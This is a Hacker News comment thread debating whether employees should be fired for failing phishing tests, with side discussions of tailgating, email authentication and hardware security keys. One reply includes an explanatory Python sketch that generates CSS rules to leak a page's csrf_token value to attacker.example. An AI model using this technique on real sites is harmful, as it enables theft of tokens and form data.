
Should Failing Phish Tests Be a Fireable Offense? - headalgorithm
https://krebsonsecurity.com/2019/05/should-failing-phish-tests-be-a-fireable-offense/
======
dsfyu404ed
I worked for a defense contractor that had a 3 strikes policy for security
violations. Failing the phishing emails was a strike. Other breaches of
security policy (like getting caught letting someone tailgate you in) could be
strikes too. You got fired at 3. Nobody thought this was unreasonable. Part of
your job when you work in defense or finance is giving a sufficient number of
fucks about things that people in other industries don't have to give many
fucks about, like security. If you don't care enough about security that you
click on obvious phishing emails then you're not doing your job. Don't do your
job and get fired.

They also did have a reporting system. Presumably you wouldn't get a strike if
you clicked and reported. People who reported "legitimate" phishing attempts
were rewarded. Spear phishing is a totally different game and nobody in their
right mind would fail people for clicking on a (well crafted) spear phishing
email.

~~~
mason55
I actually like the idea of having consequences for allowing tailgating,
assuming the company cares about it. Maybe not firing, at least not right
away or in cases where you get tricked or someone sneaks in behind you, but
put some teeth in the policy and actually enforce it.

If the company just says "don't do it" there is still social pressure to be
polite and not slam the door in someone's face. But if there are consequences
that everyone knows about then no one is going to begrudge you if you tell
them they have to swipe their own way in.

Heck, put up signs that say "allowing tailgating is a serious offense" so that
visitors are aware as well.

~~~
wang_li
Are you prepared to pay your employees a significant premium for the
requirement that they engage in fisticuffs with random strangers who may try
to tailgate into the building?

Tailgating is a problem for your physical security staff, not your run of the
mill white collar employee.

~~~
Wowfunhappy
> Are you prepared to pay your employees a significant premium for the
> requirement that they engage in fisticuffs with random strangers who may try
> to tailgate into the building?

I have zero experience with this, but I imagine the policy would be "Don't
enter the building if someone is too close behind you."

If you don't feel comfortable asking for space (fine!), turn around, go back
to your car, and call building security as necessary.

Is this shortsighted?

~~~
gnicholas
Good point. My brother was tailgated into his condo building in D.C. one
night. They robbed the office after he went up to his condo. He didn't feel
safe refusing them entry, and knew this was a risk of letting them in.

After the incident, he was contacted by the building management, who asked him
what happened and warned him not to do it again.

This seems like a reasonable policy since many people would not have thought
in advance what to do if a potentially threatening person tries to tailgate.

------
Trisell
_Rohyt Belani, CEO of Leesburg, Va.-based security firm Cofense (formerly
PhishMe), said anti-phishing education campaigns that employ strongly negative
consequences for employees who repeatedly fall for phishing tests usually
create tension and distrust between employees and the company’s security
team._

This is the key. If you think security teams aren’t hated enough for making
you change your password every 90 days, just wait until their “games” are the
reason people get fired. This is a guaranteed way to get your users to not
only not want to help you, but to actively work against you. And if enough
people scream, the C ring will eventually listen. And I don’t think the
security team will win.

~~~
freehunter
On the other hand, all the security team needs to do is point to the number of
billion-dollar breaches that have happened due to phishing. If phishing tests
are a game, then so are DR tests, so are code reviews, so is the QA
department. If phishing tests are a game, then so are your yearly performance
reviews, or showing up to work on time, or meeting your deadlines.

Not destroying the company through your own negligence should be basic
standard practice. Repeatedly failing a phishing test even when given proper
security education (like PhishMe provides) is negligence that can destroy an
entire company.

I worked in security at a company where the IT security department didn't
report up the IT chain but was under HR alongside the Internal Audit
department. Enforcing policy and holding people accountable were fundamental
expectations of our managers all the way up, no different than someone
repeatedly harassing a coworker or watching porn at work.

~~~
megaremote
So, do the security guys get fired when they misconfigure a firewall or give
the wrong settings for a database?

~~~
freehunter
If they do it wrong, get corrected with proper training, do it wrong again,
receive training again, and continue to do it wrong, then yes. Anyone would.

------
leiroigh
Phish tests need to be fair to people who actually understand something about
security.

"Opening an email" is not actually an issue (spearphishers sitting on drive-
by 0-days in current browsers or email programs are not a threat model that
most orgs can possibly defend against). Opening attachments is hard to
measure and again needs context: what kind of software and sandbox was the
attachment opened with? Attackers using some ancient forever-day word
processor exploit is realistic. Attackers sitting on fully patched VM
escapes is unrealistic. If the VM used has unimpeded network access, then
the attacker needs no VM escape. If the target opens a phish link in a
current browser, but then refuses to enter valid credentials (because the
user is wary), then the user can be argued to have passed the phish test.

If you make failure fireable, then you need to demonstrate that the victim was
actually successfully phished.

If failure requires remedial training, then you can afford a high false
positive rate: Clueless victims learn not to click on links, and sophisticated
"victims" get to talk with a security person about why their action was
dangerous or harmless, and in accordance or in violation of policy.

~~~
technion
This definitely needs to be considered. I open WSL and use curl on suspicious
looking email links. I've been logged as doing so before. I'd hate for that
log to actually go somewhere significant.

~~~
Kalium
It might be worth considering carefully how safe the practice of opening
essentially random email links might be. Are you opening the links with a full
suite of forensic measures in place, or are you dropping curl $URL into your
terminal on your workstation? It looks like WSL isn't exactly a sandbox. It
does seem to already be used by some malware:
[https://research.checkpoint.com/beware-bashware-new-method-malware-bypass-security-solutions/](https://research.checkpoint.com/beware-bashware-new-method-malware-bypass-security-solutions/)

In a world with drive-by exploits and where opening a link leaks information,
it perhaps could be considered unsafe to open essentially random links from
emails. I've definitely worked with developers who seem to believe that curl
is magical and immunizes them against every possible attack.

Curiosity is a wonderful thing! It's just sometimes it can be dangerous to a
person and to the people around them. It might not be a bad thing for people
to learn a smidge of caution.

~~~
leiroigh
One of the best policies I ever witnessed: There was a second guest network
with internet and nothing else for guests/consultants and
facebook/twitter/porn (the company just paid for internet twice). Employees
had a second crappy machine connected to the isolated guest network for this
purpose.

------
maxk42
I'm a tech professional and security is a regular part of my jobs. At one
point -- while contracting for a Fortune 500 client that shall remain unnamed
-- I received an email that was quite clearly phishing. Curious as to what the
payload was and whether it was worth reporting, I fired up lynx and followed
the link in the email from the command line.

I was promptly informed that I had failed the test and I would be receiving a
formal reprimand.

Did that make the company more secure?

~~~
ryanjshaw
Can't speak to whether a reprimand is warranted or not and I think many here
will disagree, but unless your job is investigating phishing, you shouldn't do
this because you ARE ultimately putting the corporate network at risk
unnecessarily - what if it was a real link and happened to exploit a zero day
on your box? Management wouldn't accept your reasoning for following the link
I suspect.

~~~
jsty
Considering that, from what I recall, Lynx doesn't execute JavaScript, it
would have to be one esoteric zero-day.

~~~
onion2k
Downloading and executing code is only one way a browser session can be
abused. At the very least you're giving away everything your browser (even
Lynx) puts in the headers of a request. That's often a heck of a lot of useful
information for an attacker. Lynx supports cookies too so it would be possible
to track a user between sessions. I don't know how that might benefit an
attacker but I'm not an attacker[1].

I think a reasonably paranoid approach like "Hackers might think of ways to
abuse this that I haven't thought of" is best. Unless your job is to take a
risk and visit a phishing site, don't take the risk. Even with Lynx.

[1] Exactly what an attacker would say!

~~~
BeetleB
>At the very least you're giving away everything your browser (even Lynx) puts
in the headers of a request.

Which you're giving away any time you browse any external web site.

>Lynx supports cookies too so it would be possible to track a user between
sessions.

You're downloading cookies for most external web sites.

If the worst you do is the same as going to espn.com, then reprimand people
for going to any external web site.

~~~
onion2k
The point is that you're giving data to a _known_ phishing site by visiting
the link in a phishing email. It's true that ESPN might also be a phishing
site but it's less likely.

~~~
BeetleB
And my point is the data you're giving is _not_ important.

------
morrbo
I see this a lot as a security guy. There has to be a healthy medium. Users
can be fired, sure, but this should be a last resort. It's not really fair to
say "you're fired" when you don't have DKIM/SPF/DMARC, you haven't tagged
external emails as such, you haven't provided user awareness training, you
have provided training but not in a gradual form (ie. From Nigerian prince
emails right the way through to sophisticated attacks), you're not providing
outbound filtering, educational resources or a reporting tool, you've not
registered similar domain names or <my company>. otherTLD, sandboxing, AV...
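
For anyone unfamiliar with the first items on that list: SPF and DMARC are
just DNS TXT records, so the baseline is cheap to deploy. A minimal
illustrative pair might look like the following (example.com and the policy
values are placeholders, not a recommendation for any particular org):

```
example.com.         IN TXT "v=spf1 mx include:_spf.example.com -all"
_dmarc.example.com.  IN TXT "v=DMARC1; p=quarantine; rua=mailto:dmarc-reports@example.com"
```

DKIM additionally requires the mail server to sign outgoing messages with a
key published in DNS, so it takes more than a one-line record.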

Users know what phishing is, even the most naive of them. You need to do your
darndest to make sure nothing gets into your network in the first place. If
people are repeat offenders then you have to chat with them and figure out
what's going on. If they're being intentionally obtuse - clicking emails to
see what happens even when they know it's phishing - then look into firing
them. Otherwise just act like you're on the same team and provide them with
education, but not overwhelming amounts. That seems to work, in my experience
anyway.

~~~
colechristensen
Your organization becomes more secure if people aren't afraid of revealing
their mistakes.

Seriously, you should give people who fail phishing tests cupcakes and
additional future phishing tests. If there is a continued failure or inability
to learn then there is a problem to be fixed perhaps with firing.

Cultures of fear breed disaster.

~~~
freehunter
>give people who fail phishing tests... additional future phishing tests

This usually happens, especially if they're using something like PhishMe. If
you fail the phishing test, you're _immediately_ told you were tricked, and
scheduled for mandatory training within a few days. After you complete the
training you're put on a re-targeting list.

What we're talking about isn't firing someone for making a mistake. It's
firing someone for gross negligence over and over again even when given proper
training and incentives. At some point it becomes clear that the employee is a
danger to the company. If they're that careless with their emails even after
getting caught and going through training, what else are they neglecting to
do? And who might be injured/killed because they don't care?

------
britch
I think it's very case by case. On first fail of a phishing test, absolutely
not. They should have phishing explained to them again, maybe in a more
personal setting (instead of educational video/talk).

It's definitely true that anyone can be spearphished or can fall for a
sophisticated enough phishing scheme, but if someone is continually failing
the most basic phishing tests (responding to random emails asking for your
password for example) I think that's grounds for firing.

It's akin to locking up after you leave. Is it a fireable offence to fail to
lock up the office when you leave? Probably not the first time. But if you
never lock the door, at some point it becomes a liability. Sure a professional
could break in even if you lock the front door, but it's not like locking up
is pointless.

------
jerf
Proportional to the degree of damage that can be done by the employee in
question... yes, absolutely. If you have the responsibility and authority to
disburse millions of dollars to a random bank account number, then you've got
a high degree of responsibility not to be spear-phished, and it would be a
disqualification if you are unable to resist it.

On the other hand, firing a front-line call center employee because they
failed the spear-phishing tests is fairly pointless and more damaging than
helpful.

Where exactly the line falls would be up to the business and like so many
things, involves too many factors to be reasonable to discuss here. With the
typical concentrations of power and authority in a business, it's only going
to be the minority of employees that would be faced with termination for this
problem, because only a minority will have the power to do significant damage
to the business in general.

I think it's not too difficult to think that the article is mostly talking
about the situations where it isn't proportional to the degree of damage that
can be done by the employee.

------
agurk
A few years ago I received one of these at work, before I even knew they were
a thing. I would have been very annoyed if they'd taken any action against me
for following the link in it.

The email itself looked like a standard spam email, but the link was really
weird, having a few tokens as part of a query string. Normally phishing emails
have simple URLs in them.

So I did the obvious thing of opening the link in a fresh, zero data, locked-
down VM just to see where it would take me.

I got the message that I was an idiot, and my company also was notified that
I'm clueless about information security.

I can only imagine how difficult it might be to explain to someone what I had
done, and why I probably shouldn't have to go on some tedious training course
let alone be fired. Luckily all I saw was an increase in the number of these
emails I received.

~~~
wmf
Often the phishing training says "do not investigate yourself" but maybe your
company missed that part.

~~~
agurk
There was the general "don't follow links in unknown emails" but nothing
about what to do if you're sure it's a bad email but terminally curious.

As far as I could tell nothing bad could happen (even JS was off in the
browser I used to open it) when I followed the link, but is there something I
should be aware of?

~~~
yourapostasy
Worry about CSS-based exfil.

[https://www.mike-gualtieri.com/posts/stealing-data-with-css-attack-and-defense](https://www.mike-gualtieri.com/posts/stealing-data-with-css-attack-and-defense)

The security teams are correct in the training they run about these: report
the suspicious email and leave the investigation to them, don't try to DIY the
investigation. Note you aren't penalized for false positives (reporting a
legitimate email as a phishing attempt).

~~~
heavenlyblue
I don’t understand this attack: if an attacker can control the CSS on a
page, then they can probably also control the JavaScript, which means they
can extract any data from it.

~~~
britch
I think the point was even if you disable JS in your browser to be "safe,"
there's the possibility of some nasty CSS on the page as well.

Turning off JS does not make you safe.
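
For the curious, the CSS-only trick linked above can be sketched without any
browser at all. This is a hypothetical illustration (the field name and the
attacker.example domain are made up): the attacker's stylesheet contains one
attribute-selector rule per candidate character, and the victim's browser
"reports" a match by fetching the matching background URL, no JS required.

```python
def exfil_rules(field="csrf_token", charset="abc123"):
    """Generate one CSS attribute-selector rule per candidate first
    character of the target input's value. A rule only fires (and thus
    only fetches its URL) when the value actually starts with that
    character, leaking it to the attacker's server."""
    rules = []
    for ch in charset:
        rules.append(
            'input[name="{f}"][value^="{c}"] '
            '{{ background-image: url("https://attacker.example/leak?c={c}"); }}'
            .format(f=field, c=ch)
        )
    return "\n".join(rules)

print(exfil_rules())
```

Real attacks iterate this per prefix to recover the whole value; the point is
simply that "JS is off, so I'm safe" doesn't hold.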

------
busterarm
Repeat after me:

Everyone can be spearphished.

I mean it. Everyone.

~~~
swizzler
A favorite example of mine even if it's contrived:
[https://twitter.com/sc00bzt/status/730903007014076416](https://twitter.com/sc00bzt/status/730903007014076416)

~~~
52-6F-62
Oh that's funny!

------
josefresco
I have a client in the banking industry who performed these tests. Everyone
failed. I'm not sure if they ran them again but there's a point where you need
to sit someone down and explain how serious the situation is. If they _still_
don't get it, you should probably fire them or transfer them to a department
that isn't vulnerable.

~~~
Scoundreller
Did they run the tests without training first?

What’s the point?

If Security/IT is so dense that they see any value in testing before training,
we’ve already identified a problem: either the culture, or an “our employees
are too smart for this” attitude.

~~~
aianus
> Did they run the tests without training first? What’s the point?

How do you know if your training is working if you have no baseline?

~~~
Scoundreller
They said they weren’t sure if the tests were run again. I _hope_ they were
after the training for that reason.

I’m also curious about what training methods work best (including a no-
training control group).

------
mc32
Nope. Of course not. These opportunistic campaigns use inherent human
weaknesses to lure and snare suspecting and unsuspecting users.

Now, if someone is told that official policy states you must only use approved
devices and services and you violate that and that introduces additional
weaknesses, then yes. But that’s different.

I mean phishing experts in active campaigns get phished. So, regular Jane and
Joe? ‘Course not.

------
jessriedel
Honest question: why do so many workplace penalties come with only two levels
of punishment, words ("reprimand") and getting fired? This would be like
normal law having only speeding tickets and the death penalty. Losing part of
your bonus for the year would certainly sting enough to provide a disincentive
without having to fire anyone.

~~~
chessturk
Many people don't get a bonus. If you have no benefits, an hourly wage, and no
path for advancement, the only thing they can do is whine or fire you.

~~~
jessriedel
Sure, that's an explanation for those sorts of jobs, but they aren't usually a
target of phishing attempts.

~~~
0xffff2
I'm a reasonably well paid software engineer in Silicon Valley, but I don't
get a bonus or options of any kind. I suppose my employer could take
vacation days from me or not give me a raise next year, but if they did either
of those things because I "failed" a phishing test (where "fail" doesn't even
involve giving up any credentials) I would probably be looking for a new job
anyway so they might as well fire me.

~~~
jessriedel
Forgone bonus was just an example. It could be any sort of penalty or loss of
perk, and my question is directed at the steady-state equilibrium of the job
market, not at behavior given whatever contracts are currently signed. E.g.,
instead of offering someone $85k, offer them $84k plus a $1k bonus if they
avoid phishing attacks. Or give a bonus vacation day to each employee who
passes the test. Etc.

------
dmbaggett
Phishing is frankly an embarrassment for the mainstream security community.
The temptation is to "blame the stupid users" -- but the truth is that even a
script kiddie can take a real email from a mainstream brand, "Save As
HTML...", change one link, and resend... and snare even sophisticated victims.
This BlackHat talk ([https://www.youtube.com/watch?v=Z20XNp-luNA](https://www.youtube.com/watch?v=Z20XNp-luNA))
shows just how easy it is to phish even users who think they are too good to
be fooled.

At Inky ([https://inky.com](https://inky.com)) we're using a combination of
computer vision, anomaly detection, and domain-specific hacks to identify
zero-day phishing emails "from first principles" (as I like to say). And it
works! But the pushback from the security establishment is impressive. I like
to say that there are two widely-held but false beliefs about phishing: 1)
phishing is solved; 2) phishing is unsolvable.

The truth is that we can already see clearly that within 3-5 years machines
will be good enough at identifying phishing emails that attackers will move to
another vector... but you'd never know it listening to "Security Thought
Leaders."

~~~
rurp
> The truth is that we can already see clearly that within 3-5 years machines
> will be good enough at identifying phishing emails that attackers will move
> to another vector...

Claiming that a complicated problem involving a lot of humans, one that is
very much not solved at the moment, will be fully "solved" in 3-5 years
strains credulity.

I fully expect the next decade to look much like the past several decades,
with both sides of the security arms race making incremental adjustments and
improvements.

------
bediger4000
I might consider this - if my employer gave me tools to deal with looking at
email headers, etc etc etc. That means if I have to use Outlook/Exchange, and
nobody will tell me what the external SMTP server IP address is (and other
information), this is unreasonable.

I've had two different large, corporate employers do the phishing training
thing. I've failed occasionally at both of them. You can make a phish as close
to indistinguishable from a legit email as you want.

In my experience these "phish-your-employees" programs have 2 side effects,
both possibly unwanted:

1. Reluctance to even look in Outlook for fear of getting a drive-by. I know
these haven't shown up in a while, but Outlook is a strange beast. That is,
I'm just not going to look for, or even open, emails.

2. Enthusiastic reporting of false positives. After getting burned by a decent
phish, I reported a few legit emails, including one that had a salutation of
"Dear Joe User:" or something equally generic and stupid, but was a genuine
email. There's sort of a Poe's Law in the relationship between phish and real
emails. This wastes security staff's time. Or maybe you want that. They tend
to be a bit weird and annoying.

~~~
rurp
> 2. Enthusiastic reporting of false positives

I used to work in a casino that sent out a notice to all employees urging them
to report more suspicious activity. There was no information or training given
on what specifically to look for.

After some time the initiative was deemed a great success. Although there had
been zero improvement in the rate of dangerous activity stopped or prevented,
there had been a giant increase in the amount of reports that turned out to be
false.

~~~
greedo
We just implemented the Phishhook Outlook addon. I'm sure our Security team
will love getting 9000 emails a day to sort through (3 per day per employee).

------
donio
Yes, the security team should be fired since they failed in the educational
aspects of their job.

~~~
jawns
This is a good point, and I think there are parallels to other areas of the
industry.

For instance, let's say I'm a junior developer and I'm told that merging code
that fails a suite of unit tests is a serious offense.

If I one day forget to run the test suite and merge code that breaks stuff ...
it might be my fault at an acute level.

But at an organizational level, someone should be saying, "If it's that
important to not merge code that breaks tests ... then we should change our
process so you _cannot_ merge code until all tests have passed."

And if nobody gets faulted at the organizational level, then the junior dev is
really just a scapegoat.

------
pugworthy
The Fortune 50 company I work for sends out what I can only describe as the
stupidest phishing test emails I've seen. They are blatantly simplistic and
transparent.

I have had this fantasy of trying to see if I could trick the IT people who
send them with a phishing attempt. It would involve perhaps reporting that my
virus scanner had reported something suspicious in an email to get them to
open something.

Or maybe register mimecastprotection.com, then send out a fake email to IT as
if it was a big marketing announcement from Mimecast that "We've changed our
name! We are now Mimecast Protection as part of our commitment to serving
you!"

My theory is that a really well crafted phishing email is going to be very
hard to avoid.

~~~
brootstrap
people on my team fall for it every time our corporate IT security people send
the tests. I'm like jesus guys did you look at ANY part of the email?

------
j0057
MFA as provided by FIDO/U2F seems like a much more sensible approach, one
that doesn't break down on even a momentary lapse in vigilance.

------
musicale
It makes no sense to blame users for doing perfectly normal things like
clicking on web links, reading email, opening attachments, reading a memory
card, connecting to a wireless network, etc. rather than blaming hardware and
software developers for designing systems where perfectly normal actions
result in criminals taking over your computer.

It also makes no sense to blame users for thinking an email message is from
their bank when there is no obvious, visible difference between messages from
their bank and messages from criminals.

~~~
techntoke
Except the URL is usually nothing like your bank's.

------
siffland
I was just talking to a coworker yesterday, and at his previous job part of
his security work was to go out to the employee parking lot and drop
thumbdrives; if one was plugged into the corporate network it would send a
message to the security department with the terminal and user account. I
actually said to him that no one would be stupid enough to do that; he told
me they did this monthly and at least 2 to 3 people would get caught.

He said employees had training and still failed. No one got fired for it
though.

~~~
alkonaut
It’s like people don’t have (private) computers anymore. If you get caught
doing that, or watching animal porn on your company laptop or whatever, the
problem isn’t poor IT training, the problem is that you should have bought
your own computer! How are people so eager to look at the thumb drive that
they can’t wait until they get home?

~~~
Scoundreller
I could only imagine how bad things would be if most people didn’t have their
own smartphones.

I think having a “guest” wifi discourages employees from visiting random
streaming websites on their work computers.

------
stcredzero
Is someone trying to apply AI and Deep Learning to phishing attacks? One of
the things which PG noted in "A Plan for Spam" back in the day, was that the
Bayes classifier found markers of Spam he never would have thought of.

[http://www.paulgraham.com/spam.html](http://www.paulgraham.com/spam.html)

If Phishers are concentrating on fooling human beings in the same way that
spammers were back in the day, they might be vulnerable to such techniques.
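
The combining formula from "A Plan for Spam" is small enough to sketch
directly; the token probabilities below are invented for illustration:

```python
from functools import reduce

def combined_probability(probs):
    # Graham's combining rule: treat each token's spam probability as
    # independent evidence and fold them into one overall probability:
    # p = (a*b*...) / (a*b*... + (1-a)*(1-b)*...)
    prod = reduce(lambda a, b: a * b, probs)
    inv_prod = reduce(lambda a, b: a * b, (1 - p for p in probs))
    return prod / (prod + inv_prod)

# Hypothetical probabilities for an email's most "interesting" tokens;
# one innocent-looking token doesn't rescue two very spammy ones.
print(combined_probability([0.99, 0.95, 0.20]))
```

The interesting part, as the essay notes, is the training step that assigns
those per-token probabilities; it surfaces spam markers a human would never
think to hand-code.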

~~~
nineteen999
That is such a fascinating document. Back in late 2002 or early 2003 I did an
implementation of the algorithm in that document in C (because I didn't
understand Lisp) with the help of a more senior programmer at my company.

Once my implementation started to work I was really amazed how such a simple
algorithm could be so successful.

------
bravoetch
Firing people for this would leave the entire company in a state of fear. Have
you seen those sci-fi dystopias where a script or AI unfairly decides the fate
of people...?

------
joshuak
As the article implies, absolutely not, and obviously so. Do not make enemies
of your own staff, a hostile workplace is exploitable, not to mention
unpleasant and demotivating.

My god are people bad at security. Security people especially so. Actual
security is not bound to the mechanics of securing things. It is bound
entirely to risk. Did you just fire the best accountant your company has
because they were too focused on solving your huge tax liability to notice a
phishing attempt? Risk.

Everyone is fallible including your IT security group. If phishing attacks are
actually causing appreciable damage to your company, it's the security group
who needs replacing. Can they report quantitatively how much more value your
organization has captured with its 90-day password replacement policy? And
does it account for all the passwords written on post-it notes lying around,
and the productivity impact of constantly forgotten passwords?

The purpose of security is to mitigate the risk of loss, but so is insurance.
Don't fixate on the machinery of security, and don't fire people for poor
email filtering whose value is not to filter emails.

------
sct202
I think it depends on the level of trust that you are given in your position.

I got reamed on another forum for saying someone shouldn't be allowed in a
certain role, after they sent $1 million to a fake bank account to someone
posing as a supplier. But if your workplace doesn't have controls in place to
prevent that, it's part of your job to be that control and take additional
steps to protect yourself and your employer.

------
BeetleB
My company uses similar tests - you get a random email and if you click on the
link you're required to take some training. One of the things they emphasize
is to ensure the actual URL seems legitimate, or is pointing to a company
domain if the email claims to be from within the company. Ditto for the From
field.
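
The "does this URL point at a company domain" check that the training asks
for amounts to comparing registrable hosts, not substrings. A rough sketch,
with example.com standing in for the actual company domain:

```python
from urllib.parse import urlparse

COMPANY_DOMAIN = "example.com"  # placeholder, not from the thread

def looks_internal(url):
    """Return True if the link's host is the company domain or a
    subdomain of it. Matching on host suffix (not substring) catches
    lookalikes such as example.com.evil.net."""
    host = (urlparse(url).hostname or "").lower()
    return host == COMPANY_DOMAIN or host.endswith("." + COMPANY_DOMAIN)

print(looks_internal("https://mail.example.com/login"))      # True
print(looks_internal("https://example.com.evil.net/login"))  # False
```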

Recently there were reports of an active shooter on site. Everyone got email
alerts about it. Many (most?) employees ignored the alert because the From
address was an unknown external domain. Fortunately there wasn't an active
shooter (although the person who was arrested was armed).

And then the company sent out an email asking us not to ignore those types of
emails even if it appears to be a phishing attempt.

I think from now on, just for the heck of it, I'll click on the links but
modify some of the characters in the URL. Hopefully someone _else_ in my/some
company will be notified that they need training.

------
microcolonel
Depends on what you're doing, but if your employees are dangerously gullible,
of course firing them should be on the table if they (especially repeatedly)
exercise that gullibility, and it is not feasible to give them tools to
mitigate that risk (like PGP, though that's not perfect either).

My general approach is to create computing environments which make it
generally impossible to send/receive general communications, and access
sensitive information (or the web), at the same time on the same machine. The
communication channels available to an agent while accessing a customer file
are heavily sanitized, and the environment does not allow for opening links;
images are transcoded in fresh containers on a remote machine with no general
access to the database or the internet.

The real question is: do many businesses understand the risks well enough to
make that determination well?

------
istandintraffic
We definitely do not enforce the anti-tailgating rules enough at DoD. I find
it best to stand aside and let people pass before I swipe. The funny thing is that they have
security that ensures there is ample space between us, but still some jackhole
wants to bend the rules because they are special.

------
NoPicklez
I work at a firm that creates and sends these phishing tests for our clients.
Prior to doing this type of work we always assess the "tone at the top"
regarding the culture of the workplace, to assess the suitability of doing
these tests.

However, if there are staff that repeatedly fail these tests and receive
constant training, then that's a question for the business in how willing they
are to accept the risk.

There are tools that can quite often successfully block these types of emails
before they reach the end user; most often when we are crafting these emails
we have to ask the IT teams to unblock the domain.

In my opinion, in most cases no; however, depending on the industry and the
strike rate, you might have a case for it at some point.

------
bjt2n3904
I think I'm a pretty technical guy. I'm fairly certain if my job was more
dependent on email, I'd get phished eventually. If the IT department hasn't
made a move towards using 2FA, it doesn't seem right to punish employees with
termination.

------
viraptor
I'm interested in whether a company that would fire a random employee after 3
strikes would also fire a VP-level employee. If not, then it's just BS, not
security, given how much more access a VP-level person has.

------
msla
OK, if you do that, I won't open any links in any emails from
itdepartment@example.com, where itdepartment@example.com is the group email of
my company's IT department.

I may or may not open any emails from that address _period_, depending on how
paranoid I'm feeling.

Or... and catch me if I'm talking crazy here... or do you want to fix the
email software so I can trust that only the IT department can send me emails
from itdepartment@example.com which actually make it through the firewall and
email filtering software and internal email security policy to reach my email
account?

------
infosecdude64
It depends on the industry and its regulatory obligations, as well as its
risk tolerance. Defense and finance should have a 3-strikes rule for the
specific roles within their orgs that produce the greatest risk. Health care
would be next up and may or may not benefit from a 3-strikes rule.

A better question would be: is senior leadership supporting the security and
risk-management teams in developing proper training, and in implementing and
spending the money on the proper controls, to reduce the risk of end users
being spear phished?

------
pugworthy
One thing to understand about phishing is that it isn't necessarily from
outside.

Our (large) company recently had a sort of big (we think) leak of internal
source code from a GitHub Enterprise server - done by an internal person who
DL'ed a bunch of code and put it outside.

Basically no security system in the world would have stopped that, as long as
we think the idea of sharing source code internally is a good idea.

So yea - the guns all point out, and if anyone inside your organization ever
tries to phish you, there's a good chance you'll never see it coming.

------
crazygringo
> _Should Failing Phish Tests Be a Fireable Offense?_

In one way, it's pretty easy to answer: if firing offenders reduces the real
costs of successful phishing by more than the cost of hiring and training
replacements, plus any side effects from worse morale... then yes.

But unless you're working with state/military secrets where lives could be at
risk, or on the security teams of financial institutions where a mistake could
lose tens of millions of dollars...

...then probably not.

------
overgard
In my experience, gullibility has little to do with innate intelligence and is
instead inversely correlated with trait neuroticism (i.e., distrust of other
people/the world). So if you were to fire the most gullible employees, you
might inadvertently be selecting for neuroticism, which you may not want
(unless you're in a very security-oriented business where that could be a
useful trait).

------
mg794613
I know of no civilised country whose laws would allow such a thing. Maybe for
the military or similar, but anywhere else it simply wouldn't fly, since the
whole thing is instigated and fake. What if they had responded correctly in a
real situation? It would also completely kill your workforce's morale. Do you
really want to run a fear-based organisation?

~~~
Scoundreller
I find such situations quite motivating to look for other jobs. In my
industry, it usually means they’re going to implode.

But if you’re running a monopoly, you’ll continue to exist, just in a poorly
functioning state that people have to deal with anyway.

------
Amboto2205
In the real world, i.e. Evolution, if you fall for the predator’s camouflage,
you help your species thrive by removing yourself from the gene pool. If your
fellow herd-members see you being taken down, that has a tendency to raise
their awareness. If not then they follow the same evolutionary path…

------
rdiddly
As an employee education campaign, my last Bigco employer started sending out
their OWN phishing emails, and if you clicked a link in one of them, you'd be
taken to a page explaining how you got tricked and what not to do. Pretty good
way of targeting the message to those who need it most.

~~~
0xffff2
That's pretty standard. The problem is that they don't actually attempt to
phish you. These emails are only good if your security model is that you can't
click untrusted links (i.e. you want to defend against browser 0-days). If
that's the security model, why do I even have a browser on my computer? In
fact, my organization's policy says that I'm allowed to use my work computer
for personal business (like reading a HN article while I'm taking a break)...
If they have no problem with me browsing reasonable parts of the public
internet, they have no business failing me on a phishing test that never even
asks for any credentials.

------
chris_st
Can we fire the security people at our company who test us for phishing
attacks, and then send us emails (with off-company links!) to polls, etc.,
that are required... and all the "security" in these emails is words like
"THIS IS A REAL EMAIL FROM THE COMPANY!!!"?

Sigh...

~~~
detaro
Report all those emails as suspected phishing attempts?

------
Endy
How hard is it to make people understand what a business email should or
shouldn't include? If you're being asked for data by someone you don't know,
either ask a manager or someone connected to the account in question.

Are people really so gullible & trusting?

~~~
josefresco
> If you're being asked for data by someone you don't know

That's not how spear phishing or even phishing works. The email looks like it
came from a fellow employee/boss/trusted party.

~~~
Endy
What about the sending and reply-to address? If the account is actually
compromised at a system level, that is an IT issue. Again, are people so
trusting that they don't check when asked for confidential data?

~~~
kaffeemitsahne
Sending addresses can be spoofed.

~~~
sh-run
End users should never see emails that fail DKIM or SPF checks. Sender address
spoofing is a solved problem.

If a company gets owned because they failed to implement SPF or DKIM properly,
IT is at fault, not the employee.
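
For illustration, a minimal sketch of the kind of gate the comment describes,
assuming the receiving MTA has already stamped an `Authentication-Results`
header (per RFC 8601) recording the SPF/DKIM verdicts; the header values and
message here are made up:

```python
# Hypothetical filter: reject messages whose Authentication-Results
# header records an SPF or DKIM failure, so spoofed senders never
# reach the end user's inbox.
from email import message_from_string

def passes_auth_checks(raw_message: str) -> bool:
    """Return False if Authentication-Results reports spf=fail or dkim=fail."""
    msg = message_from_string(raw_message)
    results = msg.get("Authentication-Results", "")
    return "spf=fail" not in results and "dkim=fail" not in results

spoofed = (
    "From: itdepartment@example.com\r\n"
    "Authentication-Results: mx.example.com; spf=fail; dkim=fail\r\n"
    "Subject: Urgent password reset\r\n"
    "\r\n"
    "Click here.\r\n"
)
print(passes_auth_checks(spoofed))  # False: quarantine it
```

In practice this check belongs in the MTA or gateway, not in client-side code,
but the principle is the same: an end user should never be asked to judge a
message that already failed authentication.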

------
kasey_junk
Didn't Google effectively prove that the only way to prevent phishing was U2F?

[http://fc16.ifca.ai/preproceedings/25_Lang.pdf](http://fc16.ifca.ai/preproceedings/25_Lang.pdf)

------
lalaithion
Two-factor auth prevents most phishing attacks from ultimately succeeding, and
it is probably easier to implement successfully, and better for morale, than
firing people, especially with hardware security keys nowadays.
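
As an aside on why hardware keys beat one-time codes: a TOTP code (RFC 6238)
is just a function of a shared secret and the clock, so a phishing page can
relay it to the real site in real time, whereas U2F/WebAuthn binds the
response to the origin. A minimal TOTP sketch, stdlib only:

```python
# Minimal RFC 6238 TOTP: HMAC-SHA1 over the 30-second time counter,
# dynamically truncated to a short decimal code.
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32, for_time=None, digits=6, step=30):
    """Compute the TOTP code for a base32 secret at a given Unix time."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int((time.time() if for_time is None else for_time) // step)
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F  # dynamic truncation offset
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return str(code).zfill(digits)

# RFC 6238 test vector: secret "12345678901234567890", T=59, 8 digits
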